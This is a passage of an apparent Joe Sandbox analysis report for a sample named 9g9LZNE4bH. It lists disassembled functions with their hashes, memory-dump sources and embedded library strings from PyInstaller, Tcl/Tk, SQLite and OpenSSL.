                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\statem_srvr.c$resumption
                                                                                                                                                                                                                                        • API String ID: 3535234312-332775882
                                                                                                                                                                                                                                        • Opcode ID: 85d43697d99dd48070ad5557b0bfa7d5f884ce26e4a4b16b12b7706924855d9d
                                                                                                                                                                                                                                        • Instruction ID: ec3964a36832c4501dafeec03a10b2d163e80e3f7e31d76c81fc1d6f2acec256
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85d43697d99dd48070ad5557b0bfa7d5f884ce26e4a4b16b12b7706924855d9d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AB16E22A1EBC192EB50DF16D8847AA67B0EB85BD8F041039EE8D8B795DF7CD585C700
                                                                                                                                                                                                                                        Function 00007FF78DA576B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                        • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                        • Instruction ID: f17b801c66fbee25e92912b887ae592251ef3577344d60a7e9617627fd5ad745
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B029064A0DB0BD1EA15BB95E814DB5A2A1BF04755BF40035D8AE622A4FF3CBD4DC332
                                                                                                                                                                                                                                        Function 00007FF8A881ECF0 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 487COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                                                        • API String ID: 3568877910-554953066
                                                                                                                                                                                                                                        • Opcode ID: a10e177a3e85b3714625d66b2cd7fe7964119e7fc03f594d628cf93d522f3f03
                                                                                                                                                                                                                                        • Instruction ID: 36bc1c5546cb6c293e83df49bdf528c5d9b1816a36df758dceb41de5746c9466
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a10e177a3e85b3714625d66b2cd7fe7964119e7fc03f594d628cf93d522f3f03
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B32DB72B2AB82AAEB64DF25D4806AD37A4FB48BC4F404275DE4D43799DF38E450C714
                                                                                                                                                                                                                                        Function 00007FF8A87EECE0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: new[]
                                                                                                                                                                                                                                        • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                        • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                        • Opcode ID: 637503c092be492cd4fda511486be557541f8ece5357f2cc4be0350b725c3a03
                                                                                                                                                                                                                                        • Instruction ID: 6d12c794e18ef4f8426e090fa7e03f88600e988cd533984b413f40867d1fdd6b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 637503c092be492cd4fda511486be557541f8ece5357f2cc4be0350b725c3a03
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47510622E4E28667FB15EB6198056BA2B91EF44BC8F8C0435DD8D17792EF3CE4458339
                                                                                                                                                                                                                                        Function 00007FF8A8804CE0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 311COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$a29f9949895322123f7c38fbe94c649a9d6e6c9cd0c3b41c96d694552f26b309$database corruption
                                                                                                                                                                                                                                        • API String ID: 3568877910-481979681
                                                                                                                                                                                                                                        • Opcode ID: a7d21024e195673058092d446b3059841ce808f720460b2c908ffec807c546ce
                                                                                                                                                                                                                                        • Instruction ID: 3e2306304e398e3e0362d5a647c87d682bb88c9427684100782df1313fb02d00
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7d21024e195673058092d446b3059841ce808f720460b2c908ffec807c546ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54D19B72B0AA8696DB60CF26E0056A977B4FB88BC8F158036DF4D47794DF39D842C724
                                                                                                                                                                                                                                        Function 00007FF78DA52710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF78DA51B99), ref: 00007FF78DA52760
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                        • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                        • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                        • Instruction ID: a102679c207bf8e8a0f28fad2fd7a5f3d7ad7702f2b82e44d499fd2343d61ec9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4219572A1C78192E710EB50B841BE6A3A4FB887C4FA00131FE8D83659EF7CD949C751
                                                                                                                                                                                                                                        Function 00007FF8A9314ED0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 268COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408466922.00007FF8A92E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9354000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9379000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9384000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A938E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408720209.00007FF8A9391000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007C61208
                                                                                                                                                                                                                                        • String ID: $..\s\ssl\ssl_sess.c$T
                                                                                                                                                                                                                                        • API String ID: 3535234312-2024727245
                                                                                                                                                                                                                                        • Opcode ID: 04e235955fded6e715e2a9968c5ac263d3c2d904f0d42ba18503353ba86dd6e0
                                                                                                                                                                                                                                        • Instruction ID: a1d2861d8df6148c6551b419fce85ef0c506935ccba288e8f120a0e10dc412eb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04e235955fded6e715e2a9968c5ac263d3c2d904f0d42ba18503353ba86dd6e0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35C18E36A0EAC2A2EB659F25D8947F927A1FB84BC4F141035DE1D8B7A5DF3CE5418B00
                                                                                                                                                                                                                                        Function 00007FF8A87FEDB0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$a29f9949895322123f7c38fbe94c649a9d6e6c9cd0c3b41c96d694552f26b309$database corruption
                                                                                                                                                                                                                                        • API String ID: 3568877910-481979681
                                                                                                                                                                                                                                        • Opcode ID: 91451953014f13e3dad7351947cceb385dfc86b279026e58667cb497cc0ac13c
                                                                                                                                                                                                                                        • Instruction ID: a14a27d7b74a8a03459a9525296869ebe5e207cf3495ef4ebfebe14d843a0582
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91451953014f13e3dad7351947cceb385dfc86b279026e58667cb497cc0ac13c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E71B01390E1E662E368672AA1504BEBED1E750381F444232EFEA477D1CF6CEA44D738
                                                                                                                                                                                                                                        Function 00007FF78DA5D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                        • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                        • Instruction ID: 29a24ee05253321d072c1ef32378a92ee49d4d47cac94239ae5a4f9535a6faa5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6519E22A1D6028ADF14AB55E444E38A7A1FB44B98FB48134DA5A87788EF3CEC45C711
                                                                                                                                                                                                                                        Function 00007FF78DA6A684 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                        • Opcode ID: c00590035363e6c8fe05a9486c5a4b01939d56b231b01a2e093bb4448abb86cc
                                                                                                                                                                                                                                        • Instruction ID: e124c569ee0c8ac2c3d44524dbcf1e6e41ed29b8a47023b9171b3a469cf22061
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c00590035363e6c8fe05a9486c5a4b01939d56b231b01a2e093bb4448abb86cc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E217F32618F818AD720DF65E8406AEB3A0FB88748FA00135EA8D43B58EF3CC519CB11
                                                                                                                                                                                                                                        Function 00007FF8A92E23C4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408466922.00007FF8A92E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9354000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9379000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9384000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A938E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408720209.00007FF8A9391000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007B1210
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\extensions_clnt.c
                                                                                                                                                                                                                                        • API String ID: 1012300203-592572767
                                                                                                                                                                                                                                        • Opcode ID: edc101f3a85b0b27638e87c91bbae4d2ccc787db6c327d5d2c7f388d1dad4aec
                                                                                                                                                                                                                                        • Instruction ID: 4dd80bb77d8d222deaca6752ea773651cf8d65ed69f3793a417999a3b6de4bd1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: edc101f3a85b0b27638e87c91bbae4d2ccc787db6c327d5d2c7f388d1dad4aec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB41A07270DAC196EB208F15E4402ADA7B4FB44BC4F145031EB4C87BA9EF7DD5A18700
                                                                                                                                                                                                                                        Function 00007FF78DA6F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                        • Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                        • Instruction ID: 5caf77bb7a427f7bcc5ee072635b860c76652069f9402c3a4dde291d2f2b1d77
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E121A562A0C681C2EB24AB55E04467DA3B1FB84B44FF54035DB8D43694EF7CDD49CB62
                                                                                                                                                                                                                                        Function 00007FF8A92E175D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408466922.00007FF8A92E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9354000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9379000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9384000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A938E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408720209.00007FF8A9391000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007B1210
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\extensions_srvr.c$3
                                                                                                                                                                                                                                        • API String ID: 1012300203-3555168737
                                                                                                                                                                                                                                        • Opcode ID: 8a03604f084b97590bd02f07ae30f02319525a90becd5bba08554874673e98bb
                                                                                                                                                                                                                                        • Instruction ID: 6f14c49a39ce0595baea2273341ae67593e8e06bc6bc133ee924286f8d07b3f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a03604f084b97590bd02f07ae30f02319525a90becd5bba08554874673e98bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F218B7270EA8196E7518F15E8803A963A4FB89BC8F585131DA4C8BB99DF7DD690C700
                                                                                                                                                                                                                                        Function 00007FF8A92E6FA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
